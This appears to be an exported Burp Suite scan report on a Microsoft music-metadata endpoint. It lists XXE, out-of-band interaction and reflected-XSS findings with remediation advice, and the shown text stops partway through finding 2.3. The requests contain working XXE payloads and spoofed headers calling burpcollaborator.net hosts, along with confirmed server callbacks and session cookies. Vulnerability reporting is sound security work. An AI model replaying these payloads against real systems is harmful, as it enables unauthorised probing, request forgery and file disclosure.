info.music.metaservices.microsoft.com, XXE, XSS, RCE, Example, Proof of Concept, PoC

Vulnerability Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

		Confidence
		Certain	Firm	Tentative	Total
Severity	High	8	2	0	10
	Medium	0	12	0	12
	Low	17	0	0	17
	Information	7	0	0	7

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

Number of issues

Severity

High

Medium

Low

1. XML external entity injection

2. External service interaction (DNS)

2.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]

2.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]

2.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]

2.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]

3. External service interaction (HTTP)

3.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]

3.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]

3.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]

3.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]

4. XXE via POST Request

5. Interesting input handling: Magic value: empty

5.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [text XML parameter]

5.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

5.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

5.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

5.5. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

5.6. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

5.7. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

5.8. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

6. Secret input: url

6.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx

6.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx

7. Interesting input handling: Magic value: null

7.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

7.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]

8. Unencrypted communications

9. Content Sniffing not disabled

9.1. http://info.music.metaservices.microsoft.com/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx

9.2. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx

9.3. http://info.music.metaservices.microsoft.com/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

9.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx

9.5. http://info.music.metaservices.microsoft.com/favicon.ico

10. Browser cross-site scripting filter misconfiguration

10.1. http://info.music.metaservices.microsoft.com/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx

10.2. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx

10.3. http://info.music.metaservices.microsoft.com/cdinfo/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

10.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx

10.5. http://info.music.metaservices.microsoft.com/favicon.ico

11. Software Version Numbers Revealed

11.1. http://info.music.metaservices.microsoft.com/

11.2. http://info.music.metaservices.microsoft.com/

11.3. http://info.music.metaservices.microsoft.com/

11.4. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx

11.5. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx

11.6. http://info.music.metaservices.microsoft.com/favicon.ico

12. Cross-site scripting (reflected)

12.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]

12.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [requestID parameter]

13. Input returned in response (reflected)

13.1. http://info.music.metaservices.microsoft.com/cdinfo/GetMDRCDPOSTURL.aspx [locale parameter]

13.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]

13.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [requestID parameter]

14. HTML does not specify charset

14.1. http://info.music.metaservices.microsoft.com/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c/getmdrcd.aspx

14.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx

1. XML external entity injection
Next

Summary

	Severity:	High
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

The application is vulnerable to XML external entity injection. The tag <!DOCTYPE foo [<!ENTITY xxeu6ryl SYSTEM "http://u72w7n4zslswl1392l9eqc19b0hr7f13sufk39.burpcollaborator.net"> ]> was injected into the XML sent to the server. This tag defines an external entity, xxeu6ryl, which references a URL on an external domain. The application interacted with that domain, indicating that the parser processed the injected external entity.

Issue background

XML external entity (XXE) injection vulnerabilities arise when applications process user-supplied XML documents without disabling references to external resources. XML parsers typically support external references by default, even though they are rarely required by applications during normal usage.

External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random.

External entities can often also reference network resources via the HTTP protocol handler. The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Issue remediation

Parsers that are used to process XML from untrusted sources should be configured to disable processing of all external resources. This is usually possible, and will prevent a number of related attacks. You should consult the documentation for your XML parsing library to determine how to achieve this.

XML external entity injection makes use of the DOCTYPE tag to define the injected entity. It may also be possible to disable the DOCTYPE tag or use input validation to block input containing it.

References

XXE injection

Vulnerability classifications

CWE-611: Improper Restriction of XML External Entity Reference ('XXE')

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ksgtitxhft9mh2ymxcuykq39f0lwdx1m.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 17015
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://0gh969lx39x25im2lsie86rp3g9c15pu.burpcollaborator.net/ref
X-Real-IP: spoofed.zwz8m81wj8d1lh211rydo57ojfpbh55u.burpcollaborator.net
Forwarded: for=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;by=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;host=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net
X-Forwarded-For: spoofed.iqcrgrvfdr7kf0wkvaswio17dyjubqzf.burpcollaborator.net
Contact: root@hrcqhqweeq8jgzxjw9tvjn26exktcq0f.burpcollaborator.net
From: root@s0t1q15pn1hupa6u5k26sybhn8t4l29r.burpcollaborator.net
True-Client-IP: spoofed.t1v2r26qo2ivqb7v6l37tzcio9u5m4at.burpcollaborator.net
X-Wap-Profile: http://c0dlql59nlhepu6e542qsib1nstolo9d.burpcollaborator.net/wap.xml
Client-ip: spoofed.x646w6but6nzvfczbp8by3hmtdz9rbf0.burpcollaborator.net

<!DOCTYPE foo [<!ENTITY xxeu6ryl SYSTEM "http://u72w7n4zslswl1392l9eqc19b0hr7f13sufk39.burpcollaborator.net"> ]><METADATA>
<MDQ-CD>
<mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC&xxeu6ryl;</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 17: Boston Garden, Boston, MA 9/25/91</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>17</word>
<word>Boston</word>
<word>Garden</word>
<word>Boston</word>
<word>MA</word>
<word>9</word>
<word>25</word>
<word>91</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Help On the Way</text>
<word>Help</word>
<word>On</word>
<word>the</word>
<word>Way</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Help On the Way.m4a</filename>
<trackDuration>255326</trackDuration>
<bitrate>302064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Victim or the Crime</text>
<word>Victim</word>
<word>or</word>
<word>the</word>
<word>Crime</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Victim or the Crime.m4a</filename>
<trackDuration>505010</trackDuration>
<bitrate>277032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>That Would Be Something</text>
<word>That</word>
<word>Would</word>
<word>Be</word>
<word>Something</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 That Would Be Something.m4a</filename>
<trackDuration>231526</trackDuration>
<bitrate>267560</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Slipknot!</text>
<word>Slipknot</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 Slipknot!.m4a</filename>
<trackDuration>330466</trackDuration>
<bitrate>277496</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Crazy Fingers</text>
<word>Crazy</word>
<word>Fingers</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Crazy Fingers.m4a</filename>
<trackDuration>578919</trackDuration>
<bitrate>270592</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Playing In the Band.m4a</filename>
<trackDuration>323616</trackDuration>
<bitrate>283784</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Franklin's Tower</text>
<word>Franklins</word>
<word>Tower</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Franklin's Tower.m4a</filename>
<trackDuration>641660</trackDuration>
<bitrate>277072</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>562642</trackDuration>
<bitrate>281312</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 China Doll.m4a</filename>
<trackDuration>347022</trackDuration>
<bitrate>264424</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
<track>
<title>
<text>Walkin' Blues</text>
<word>Walkin</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Walkin' Blues.m4a</filename>
<trackDuration>390884</trackDuration>
<bitrate>274608</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 Terrapin Station.m4a</filename>
<trackDuration>767930</trackDuration>
<bitrate>271168</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
<text>Throwing Stones</text>
<word>Throwing</word>
<word>Stones</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>3-04 Throwing Stones.m4a</filename>
<trackDuration>539469</trackDuration>
<bitrate>276512</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>It Must Have Been the Roses</text>
<word>It</word>
<word>Must</word>
<word>Have</word>
<word>Been</word>
<word>the</word>
<word>Roses</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 It Must Have Been the Roses.m4a</filename>
<trackDuration>345977</trackDuration>
<bitrate>263432</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>Boston Clam Jam</text>
<word>Boston</word>
<word>Clam</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 Boston Clam Jam.m4a</filename>
<trackDuration>337409</trackDuration>
<bitrate>274216</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>3-05 Not Fade Away.m4a</filename>
<trackDuration>541791</trackDuration>
<bitrate>262816</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Dire Wolf</text>
<word>Dire</word>
<word>Wolf</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Dire Wolf.m4a</filename>
<trackDuration>239653</trackDuration>
<bitrate>263096</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 Drums.m4a</filename>
<trackDuration>664764</trackDuration>
<bitrate>265960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>The Mighty Quinn</text>
<word>The</word>
<word>Mighty</word>
<word>Quinn</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>3-06 The Mighty Quinn.m4a</filename>
<trackDuration>281054</trackDuration>
<bitrate>263256</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Queen Jane Approximately</text>
<word>Queen</word>
<word>Jane</word>
<word>Approximately</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Queen Jane Approximately.m4a</filename>
<trackDuration>436883</trackDuration>
<bitrate>269672</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Space</text>
<word>Space</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Space.m4a</filename>
<trackDuration>495537</trackDuration>
<bitrate>261064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Samson and Delilah</text>
<word>Samson</word>
<word>and</word>
<word>Delilah</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>3-07 Samson and Delilah.m4a</filename>
<trackDuration>467348</trackDuration>
<bitrate>279320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>22</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Tennessee Jed.m4a</filename>
<trackDuration>470366</trackDuration>
<bitrate>268080</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Eyes of the World</text>
<word>Eyes</word>
<word>of</word>
<word>the</word>
<word>World</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>3-08 Eyes of the World.m4a</filename>
<trackDuration>1410078</trackDuration>
<bitrate>276416</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>23</trackRequestID>
</track>
<track>
<title>
<text>The Music Never Stopped</text>
<word>The</word>
<word>Music</word>
<word>Never</word>
<word>Stopped</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 The Music Never Stopped.m4a</filename>
<trackDuration>498718</trackDuration>
<bitrate>273520</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type A for the domain name u72w7n4zslswl1392l9eqc19b0hr7f13sufk39.burpcollaborator.net.

The lookup was received from IP address 65.55.5.153 at 2017-Sep-03 23:38:05 UTC.

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 157.56.59.219 at 2017-Sep-03 23:38:05 UTC.

Request to Collaborator

GET / HTTP/1.1
Host: u72w7n4zslswl1392l9eqc19b0hr7f13sufk39.burpcollaborator.net
Connection: Keep-Alive

Response from Collaborator

HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 61

<html><body>usjp4ges3lxa0r4zl9q3p2zjjigmgjjfigz</body></html>

2. External service interaction (DNS)
Previous Next

There are 4 instances of this issue:

/cdinfo/getmdrcd.aspx [manual insertion point 1]
/cdinfo/getmdrcd.aspx [manual insertion point 1]
/cdinfo/getmdrcd.aspx [request body]
/cdinfo/getmdrcd.aspx [request body]

Issue background

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

In cases where DNS-based interactions can be triggered, it is normally possible to trigger interactions using other service types, and these are reported as separate issues. If a payload that specifies a particular service type (e.g. a URL) triggers only a DNS-based interaction, then this strongly indicates that the application attempted to connect using that other service, but was prevented from doing so by egress filters in place at the network layer. The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Remediation background

You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.

If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.

References

Burp Collaborator

Vulnerability classifications

2.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]
Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. The tag <!DOCTYPE foo PUBLIC "-//B/A/EN" "http://4af6ax79vvv6ob6j5vcotm4jeak68wwukla80wp.burpcollaborator.net"> was injected into the XML sent to the server in the manual insertion point 1. This payload defines an XML doctype that references a URL on an external domain.

The application performed a DNS lookup of the specified domain, indicating that the XML parser processed the injected doctype definition.

Remediation detail

This attack makes use of the XML DOCTYPE tag to define a doctype that references a URL on an external domain. The XML parser that processes this input should be configured to ignore the DOCTYPE tag, or to reject doctypes that reference an external URL. Alternatively, it may be possible to use input validation to block input that defines an unsuitable doctype.

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo PUBLIC "-//B/A/EN" "http://4af6ax79vvv6ob6j5vcotm4jeak68wwukla80wp.burpcollaborator.net">
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 19 Dec 2018 20:42:30 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID><ResponseCode>Error: Parse Error</ResponseCode><ResponseCode>Expected DTD markup was not found. Line 1, position 1.</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type A for the domain name 4af6ax79vvv6ob6j5vcotm4jeak68wwukla80wp.burpcollaborator.net.

The lookup was received from IP address 23.103.131.16 at 2018-Dec-19 20:42:29 UTC.

2.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]
Previous Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. The tag <?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>[0x0d][0x0a] <!DOCTYPE foo [<!ENTITY % lnwi6 SYSTEM "http://9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net">%lnwi6; ]>[0x0d][0x0a] <!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>[0x0d][0x0a]<foo>&xxe;</foo>[0x0d][0x0a] was injected into the XML sent to the server in the manual insertion point 1. This payload defines an XML parameter entity within a doctype that references a URL on an external domain.

The application performed a DNS lookup of the specified domain, indicating that the XML parser processed the injected parameter entity within the doctype definition.

The behavior appears to be asynchronous, and the Collaborator interaction occurred approximately 10 weeks after the scan of the item was completed.

Remediation detail

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<!DOCTYPE foo [<!ENTITY % lnwi6 SYSTEM "http://9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net">%lnwi6; ]>
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type A for the domain name 9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net.

The lookup was received from IP address 65.55.37.36 at 2019-Feb-24 16:40:58 UTC.

2.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]
Previous Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. The tag <!DOCTYPE metadata PUBLIC "-//B/A/EN" "http://svruvlsxgjgu9zr7qjxceap7zy5pvdt1ks7iv7.burpcollaborator.net"> was injected into the XML sent to the server. This payload defines an XML doctype that references a URL on an external domain.

The application performed a DNS lookup of the specified domain, indicating that the XML parser processed the injected doctype definition.

Remediation detail

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ksgtitxhft9mh2ymxcuykq39f0lwdx1m.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 17015
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://0gh969lx39x25im2lsie86rp3g9c15pu.burpcollaborator.net/ref
X-Real-IP: spoofed.zwz8m81wj8d1lh211rydo57ojfpbh55u.burpcollaborator.net
Forwarded: for=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;by=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;host=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net
X-Forwarded-For: spoofed.iqcrgrvfdr7kf0wkvaswio17dyjubqzf.burpcollaborator.net
Contact: root@hrcqhqweeq8jgzxjw9tvjn26exktcq0f.burpcollaborator.net
From: root@s0t1q15pn1hupa6u5k26sybhn8t4l29r.burpcollaborator.net
True-Client-IP: spoofed.t1v2r26qo2ivqb7v6l37tzcio9u5m4at.burpcollaborator.net
X-Wap-Profile: http://c0dlql59nlhepu6e542qsib1nstolo9d.burpcollaborator.net/wap.xml
Client-ip: spoofed.x646w6but6nzvfczbp8by3hmtdz9rbf0.burpcollaborator.net

<!DOCTYPE metadata PUBLIC "-//B/A/EN" "http://svruvlsxgjgu9zr7qjxceap7zy5pvdt1ks7iv7.burpcollaborator.net"><METADATA>
<MDQ-CD>
<mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 17: Boston Garden, Boston, MA 9/25/91</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>17</word>
<word>Boston</word>
<word>Garden</word>
<word>Boston</word>
<word>MA</word>
<word>9</word>
<word>25</word>
<word>91</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Help On the Way</text>
<word>Help</word>
<word>On</word>
<word>the</word>
<word>Way</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Help On the Way.m4a</filename>
<trackDuration>255326</trackDuration>
<bitrate>302064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Victim or the Crime</text>
<word>Victim</word>
<word>or</word>
<word>the</word>
<word>Crime</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Victim or the Crime.m4a</filename>
